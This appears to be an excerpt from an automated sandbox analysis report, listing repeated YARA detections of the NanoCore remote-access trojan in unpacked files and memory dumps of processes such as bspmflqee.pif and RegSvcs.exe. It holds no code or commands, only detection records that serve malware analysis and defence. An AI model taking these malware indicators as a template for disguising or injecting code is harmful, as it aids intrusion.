        Source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 32.2.RegSvcs.exe.4a107ce.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.RegSvcs.exe.3779650.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.RegSvcs.exe.2bf9650.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.RegSvcs.exe.377e6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 5.2.RegSvcs.exe.6440000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.3892d98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.RegSvcs.exe.2bfe6b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.RegSvcs.exe.476b041.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 32.2.RegSvcs.exe.4a1b041.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.6fb0000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 32.2.RegSvcs.exe.3a29650.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.6fb4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 32.2.RegSvcs.exe.3a29650.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 5.2.RegSvcs.exe.48b07ce.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.RegSvcs.exe.2bf9650.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.48bb041.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.6fb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000013.00000002.450263245.0000000002B91000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000020.00000002.539382391.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000005.00000002.574999029.0000000006440000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
